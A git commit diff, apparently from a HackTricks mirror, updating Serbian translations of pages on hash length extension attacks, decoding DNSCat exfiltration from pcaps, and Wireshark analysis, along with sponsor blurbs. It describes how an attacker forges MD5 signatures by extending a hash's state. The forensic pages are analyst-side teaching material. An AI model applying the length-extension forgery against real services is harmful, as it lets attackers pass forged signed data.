mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.
This commit is contained in:
parent
ad9622afad
commit
6d5f012968
35 changed files with 781 additions and 733 deletions
32
README.md
32
README.md
|
@ -8,7 +8,7 @@ _Hacktricks logotipi i dizajn pokreta od_ [_@ppiernacho_](https://www.instagram.
|
|||
**Dobrodošli na wiki gde ćete pronaći svaki hakovan trik/tehniku/šta god sam naučio iz CTF-ova, aplikacija u stvarnom životu, čitanjem istraživanja i vesti.**
|
||||
{% endhint %}
|
||||
|
||||
Za početak pratite ovu stranicu gde ćete pronaći **tipičan tok** koji **treba da pratite prilikom pentesta** jedne ili više **mašina:**
|
||||
Za početak pratite ovu stranicu gde ćete pronaći **tipičan tok** koji **treba pratiti prilikom pentesta** jedne ili više **mašina:**
|
||||
|
||||
{% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %}
|
||||
[pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md)
|
||||
|
@ -20,7 +20,7 @@ Za početak pratite ovu stranicu gde ćete pronaći **tipičan tok** koji **treb
|
|||
|
||||
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**STM Cyber**](https://www.stmcyber.com) je odlična kompanija za sajber bezbednost čiji je slogan **HAKUJ NEHAKOVANO**. Sprovode sopstvena istraživanja i razvijaju sopstvene alate za hakovanje kako bi **ponudili nekoliko vrednih usluga sajber bezbednosti** poput pentestinga, Crvenih timova i obuke.
|
||||
[**STM Cyber**](https://www.stmcyber.com) je odlična kompanija za sajber bezbednost čiji je slogan **HAKUJ NEHAKOVANO**. Sprovode sopstvena istraživanja i razvijaju svoje alate za hakovanje kako bi **ponudili nekoliko vrednih usluga sajber bezbednosti** poput pentestinga, Crvenih timova i obuke.
|
||||
|
||||
Možete proveriti njihov **blog** na [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
|
||||
|
||||
|
@ -55,7 +55,7 @@ Možete proveriti njihov **blog** na [**https://blog.stmcyber.com**](https://blo
|
|||
<figure><img src=".gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako kreirate i **automatizujete radne tokove** pokretane najnaprednijim alatima zajednice.
|
||||
Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako izgradite i **automatizujete radne tokove** pokretane najnaprednijim alatima zajednice.
|
||||
|
||||
Pristupite danas:
|
||||
|
||||
|
@ -71,7 +71,7 @@ Pridružite se [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)
|
|||
|
||||
* **Uvide u hakovanje:** Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja
|
||||
* **Vesti u realnom vremenu o hakovanju:** Ostanite informisani o brzom svetu hakovanja kroz vesti i uvide u realnom vremenu
|
||||
* **Najnovije obaveštenja:** Ostanite informisani o najnovijim bug bounty programima i važnim ažuriranjima platforme
|
||||
* **Najnovije obaveštenja:** Budite informisani o najnovijim bug bounty programima i važnim ažuriranjima platforme
|
||||
|
||||
**Pridružite nam se na** [**Discordu**](https://discord.com/invite/N3FrSbmwdy) i počnite da sarađujete sa vrhunskim hakerima danas!
|
||||
|
||||
|
@ -81,7 +81,7 @@ Pridružite se [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)
|
|||
|
||||
<figure><img src=".gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Odmah dostupno podešavanje za procenu ranjivosti i testiranje penetracije**. Pokrenite kompletan pentest od bilo kog mesta sa preko 20 alata i funkcija koje idu od rekonstrukcije do izveštavanja. Mi ne zamenjujemo pentestere - razvijamo prilagođene alate, detekciju i module za eksploataciju kako bismo im omogućili više vremena za dublje kopanje, otvaranje školjki i zabavu.
|
||||
**Odmah dostupno podešavanje za procenu ranjivosti i testiranje penetracije**. Pokrenite kompletan pentest od bilo kog mesta sa preko 20 alata i funkcija koje idu od izviđanja do izveštavanja. Mi ne zamenjujemo pentestere - razvijamo prilagođene alate, detekciju i module za eksploataciju kako bismo im omogućili više vremena za dublje istraživanje, otvaranje školjki i zabavu.
|
||||
|
||||
{% embed url="https://pentest-tools.com/" %}
|
||||
|
||||
|
@ -91,10 +91,10 @@ Pridružite se [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)
|
|||
|
||||
<figure><img src=".gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
SerpApi nudi brze i jednostavne API-jeve u realnom vremenu za **pristup rezultatima pretrage na pretraživačima**. Oni skeniraju pretraživače, upravljaju proxy-jima, rešavaju captcha-e i parsiraju sve bogate strukturirane podatke za vas.
|
||||
SerpApi nudi brze i jednostavne API-je u realnom vremenu za **pristup rezultatima pretrage na pretraživačima**. Oni skeniraju pretraživače, upravljaju proxy-jima, rešavaju captcha-e i parsiraju sve bogate strukturirane podatke za vas.
|
||||
|
||||
Pretplata na jedan od planova SerpApi uključuje pristup preko 50 različitih API-ja za skeniranje različitih pretraživača, uključujući Google, Bing, Baidu, Yahoo, Yandex i druge.\
|
||||
Za razliku od drugih pružalaca, **SerpApi ne skenira samo organske rezultate**. Odgovori SerpApi-a dosledno uključuju sve reklame, inline slike i video zapise, grafove znanja i druge elemente i funkcije prisutne u rezultatima pretrage.
|
||||
Za razliku od drugih pružalaca, **SerpApi ne skenira samo organske rezultate**. Odgovori SerpApi-a uvek uključuju sve oglase, ugrađene slike i video zapise, grafove znanja i druge elemente i funkcije prisutne u rezultatima pretrage.
|
||||
|
||||
Trenutni klijenti SerpApi-a uključuju **Apple, Shopify i GrubHub**.\
|
||||
Za više informacija pogledajte njihov [**blog**](https://serpapi.com/blog/)**,** ili probajte primer u njihovom [**igralištu**](https://serpapi.com/playground)**.**\
|
||||
|
@ -114,28 +114,28 @@ Možete **napraviti besplatan nalog** [**ovde**](https://serpapi.com/users/sign\
|
|||
|
||||
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WebSec**](https://websec.nl) je profesionalna kompanija za sajber bezbednost sa sedištem u **Amsterdamu** koja pomaže **zaštiti** poslovanja **širom sveta** od najnovijih sajber bezbednosnih pretnji pružajući **usluge ofanzivne bezbednosti** sa **modernim** pristupom.
|
||||
[**WebSec**](https://websec.nl) je profesionalna kompanija za sajber bezbednost sa sedištem u **Amsterdamu** koja pomaže u **zaštiti** poslovanja **širom sveta** od najnovijih sajber bezbednosnih pretnji pružajući **usluge ofanzivne bezbednosti** sa **modernim** pristupom.
|
||||
|
||||
WebSec je **kompanija za sveobuhvatnu bezbednost** što znači da rade sve; Pentesting, **bezbednosne** provere, obuke o svesti, phishing kampanje, pregled koda, razvoj eksploatacije, outsourcing bezbednosnih stručnjaka i mnogo više.
|
||||
WebSec je sveobuhvatna bezbednosna kompanija što znači da rade sve; Pentesting, **bezbednosne** provere, obuke o svesti, kampanje ribarenja, pregled koda, razvoj eksploatacija, outsourcing bezbednosnih stručnjaka i mnogo više.
|
||||
|
||||
Još jedna cool stvar u vezi sa WebSec-om je da, za razliku od industrijskog proseka, WebSec je **veoma siguran u svoje veštine**, do te mere da **garantuje najbolje kvalitetne rezultate**, piše na njihovom sajtu "**Ako ne možemo da hakuujemo, ne plaćate!**". Za više informacija pogledajte njihovu [**veb stranicu**](https://websec.nl/en/) i [**blog**](https://websec.nl/blog/)!
|
||||
Još jedna cool stvar u vezi sa WebSec-om je što, za razliku od industrijskog proseka, WebSec je **veoma siguran u svoje veštine**, do te mere da **garantuje najbolje kvalitetne rezultate**, piše na njihovom sajtu "**Ako ne možemo da hakuujemo, ne plaćate!**". Za više informacija pogledajte njihovu [**veb stranicu**](https://websec.nl/en/) i [**blog**](https://websec.nl/blog/)!
|
||||
|
||||
Pored navedenog, WebSec je takođe **posvećeni podržavalac HackTricks-a.**
|
||||
|
||||
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokrenut na **dark webu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomverom koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
## Licenca i Odricanje od odgovornosti
|
||||
## Licenca i Izjava o odricanju od odgovornosti
|
||||
|
||||
Proverite ih na:
|
||||
|
||||
|
@ -149,7 +149,7 @@ Proverite ih na:
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
|
|
@ -6,17 +6,17 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
|
@ -30,11 +30,11 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Zamislite server koji **potpisuje** neke **podatke** tako što **dodaje** **tajnu vrednost** nekim poznatim čistim tekstualnim podacima, a zatim hešira te podatke. Ako znate:
|
||||
|
||||
* **Dužinu tajne** (ovo takođe može biti probijeno iz datog opsega dužine)
|
||||
* **Dužinu tajne** (ovo takođe može biti probijeno unutar datog opsega dužine)
|
||||
* **Čiste tekstualne podatke**
|
||||
* **Algoritam (i ako je ranjiv na ovaj napad)**
|
||||
* **Algoritam (i ranjiv je na ovaj napad)**
|
||||
* **Padding je poznat**
|
||||
* Obično se koristi podrazumevani, pa ako su ispunjeni i ostali 3 zahteva, i ovaj je
|
||||
* Obično se koristi podrazumevani, pa ako su ispunjeni i ostali zahtevi, i ovaj je
|
||||
* Padding varira u zavisnosti od dužine tajne+podataka, zbog čega je potrebna dužina tajne
|
||||
|
||||
Onda je moguće da **napadač** **doda** **podatke** i **generiše** validan **potpis** za **prethodne podatke + dodate podatke**.
|
||||
|
@ -43,13 +43,13 @@ Onda je moguće da **napadač** **doda** **podatke** i **generiše** validan **p
|
|||
|
||||
Osnovno, ranjivi algoritmi generišu heševe tako što prvo **heširaju blok podataka**, a zatim, **iz** **prethodno** kreiranog **heša** (stanja), dodaju **sledeći blok podataka** i **heširaju ga**.
|
||||
|
||||
Zamislite da je tajna "tajna" i podaci su "podaci", MD5 od "tajnapodaci" je 6036708eba0d11f6ef52ad44e8b74d5b.\
|
||||
Zatim, zamislite da je tajna "tajna" i podaci su "podaci", MD5 od "tajnapodaci" je 6036708eba0d11f6ef52ad44e8b74d5b.\
|
||||
Ako napadač želi da doda string "dodatak" može:
|
||||
|
||||
* Generisati MD5 od 64 "A"
|
||||
* Promeniti stanje prethodno inicijalizovanog heša u 6036708eba0d11f6ef52ad44e8b74d5b
|
||||
* Dodati string "dodatak"
|
||||
* Završiti heš i rezultirajući heš će biti **validan za "tajna" + "podaci" + "padding" + "dodatak"**
|
||||
* Završiti heš i rezultujući heš će biti **validan za "tajna" + "podaci" + "padding" + "dodatak"**
|
||||
|
||||
## **Alat**
|
||||
|
||||
|
@ -59,11 +59,11 @@ Ako napadač želi da doda string "dodatak" može:
|
|||
|
||||
Ovaj napad možete pronaći dobro objašnjen na [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
|
@ -79,7 +79,7 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -12,8 +12,21 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
Ako imate pcap sa podacima koji se **eksfiltriraju pomoću DNSCat-a** (bez korišćenja enkripcije), možete pronaći eksfiltrirani sadržaj.
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
Ako imate pcap sa podacima koji se **eksfiltriraju putem DNSCata** (bez korišćenja enkripcije), možete pronaći eksfiltrirani sadržaj.
|
||||
|
||||
Samo trebate znati da **prva 9 bajtova** nisu stvarni podaci već su povezani sa **C\&C komunikacijom**:
|
||||
```python
|
||||
|
@ -48,7 +61,7 @@ python3 dnscat_decoder.py sample.pcap bad_domain
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
|
|
@ -1,6 +1,4 @@
|
|||
# Trikovi za Wireshark
|
||||
|
||||
## Trikovi za Wireshark
|
||||
# Trikovi sa Wireshark-om
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -10,12 +8,26 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodiču PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Unapredite svoje veštine sa Wireshark-om
|
||||
|
||||
### Tutorijali
|
||||
|
@ -37,13 +49,13 @@ Klikom na _**Analyze** --> **Expert Information**_ dobićete **pregled** onoga
|
|||
|
||||
**Rešene adrese**
|
||||
|
||||
Pod _**Statistics --> Resolved Addresses**_ možete pronaći nekoliko **informacija** koje je Wireshark "**rešio**" kao što su port/transport do protokola, MAC do proizvođača, itd. Korisno je znati šta je uključeno u komunikaciju.
|
||||
Pod _**Statistics --> Resolved Addresses**_ možete pronaći nekoliko **informacija** koje je wireshark "**rešio**" kao što su port/transport do protokola, MAC do proizvođača, itd. Korisno je znati šta je uključeno u komunikaciju.
|
||||
|
||||
![](<../../../.gitbook/assets/image (890).png>)
|
||||
|
||||
**Hijerarhija protokola**
|
||||
|
||||
Pod _**Statistics --> Protocol Hierarchy**_ možete pronaći **protokole** koji su **uključeni** u komunikaciju i podatke o njima.
|
||||
Pod _**Statistics --> Protocol Hierarchy**_ možete pronaći **protokole** koji su **učestvovali** u komunikaciji i podatke o njima.
|
||||
|
||||
![](<../../../.gitbook/assets/image (583).png>)
|
||||
|
||||
|
@ -73,7 +85,7 @@ Pod _**Statistics --> I/O Graph**_ možete pronaći **grafikon komunikacije**.
|
|||
|
||||
### Filteri
|
||||
|
||||
Ovde možete pronaći Wireshark filtere u zavisnosti od protokola: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
|
||||
Ovde možete pronaći wireshark filtere u zavisnosti od protokola: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
|
||||
Drugi interesantni filteri:
|
||||
|
||||
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
|
||||
|
@ -85,7 +97,7 @@ Drugi interesantni filteri:
|
|||
|
||||
### Pretraga
|
||||
|
||||
Ako želite da **pretražujete** **sadržaj** unutar **paketa** sesija pritisnite _CTRL+f_. Možete dodati nove slojeve glavnoj informacionoj traci (Br., Vreme, Izvor, itd.) pritiskom na desno dugme, a zatim na uređivanje kolone.
|
||||
Ako želite da **pretražujete** **sadržaj** unutar **paketa** sesija pritisnite _CTRL+f_. Možete dodati nove slojeve u glavnu informacionu traku (Br., Vreme, Izvor, itd.) pritiskom na desno dugme, a zatim na uređivanje kolone.
|
||||
|
||||
### Besplatne pcap laboratorije
|
||||
|
||||
|
@ -113,9 +125,9 @@ U trenutnom Wireshark-u umesto `bootp` treba da tražite `DHCP`
|
|||
|
||||
![](<../../../.gitbook/assets/image (1000).png>)
|
||||
|
||||
## Dekripcija TLS
|
||||
## Dekriptovanje TLS-a
|
||||
|
||||
### Dekripcija https saobraćaja sa privatnim ključem servera
|
||||
### Dekriptovanje https saobraćaja sa privatnim ključem servera
|
||||
|
||||
_izmeni>postavke>protokol>ssl>_
|
||||
|
||||
|
@ -123,20 +135,19 @@ _izmeni>postavke>protokol>ssl>_
|
|||
|
||||
Pritisnite _Izmeni_ i dodajte sve podatke servera i privatnog ključa (_IP, Port, Protokol, Datoteka ključa i lozinka_)
|
||||
|
||||
### Dekripcija https saobraćaja sa simetričnim sesijskim ključevima
|
||||
### Dekriptovanje https saobraćaja sa simetričnim sesijskim ključevima
|
||||
|
||||
Kako Firefox tako i Chrome imaju mogućnost da beleže TLS sesijske ključeve, koji se mogu koristiti sa Wireshark-om za dekripciju TLS saobraćaja. Ovo omogućava dublju analizu sigurnih komunikacija. Više detalja o tome kako izvršiti ovu dekripciju možete pronaći u vodiču na [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
|
||||
Kako Firefox tako i Chrome imaju mogućnost da beleže TLS sesijske ključeve, koji se mogu koristiti sa Wireshark-om za dekriptovanje TLS saobraćaja. Ovo omogućava dublju analizu sigurnih komunikacija. Više detalja o tome kako izvršiti ovu dekripciju možete pronaći u vodiču na [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
|
||||
|
||||
Da biste ovo detektovali, pretražite okruženje za promenljivu `SSLKEYLOGFILE`
|
||||
Da biste ovo otkrili, pretražite okruženje za promenljivu `SSLKEYLOGFILE`
|
||||
|
||||
Datoteka deljenih ključeva će izgledati ovako:
|
||||
|
||||
![](<../../../.gitbook/assets/image (817).png>)
|
||||
|
||||
Da biste ovo uvezali u Wireshark idite na \_izmeni > postavke > protokol > ssl > i uvezite ga u (Pre)-Master-Secret log naziv datoteke:
|
||||
Da biste ovo uvezli u wireshark idite na \_izmeni > postavke > protokol > ssl > i uvezite je u (Pre)-Master-Secret log filename:
|
||||
|
||||
![](<../../../.gitbook/assets/image (986).png>)
|
||||
|
||||
## ADB komunikacija
|
||||
|
||||
Izvucite APK iz ADB komunikacije gde je APK poslat:
|
||||
|
@ -166,16 +177,29 @@ f = open('all_bytes.data', 'w+b')
|
|||
f.write(all_bytes)
|
||||
f.close()
|
||||
```
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJE**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
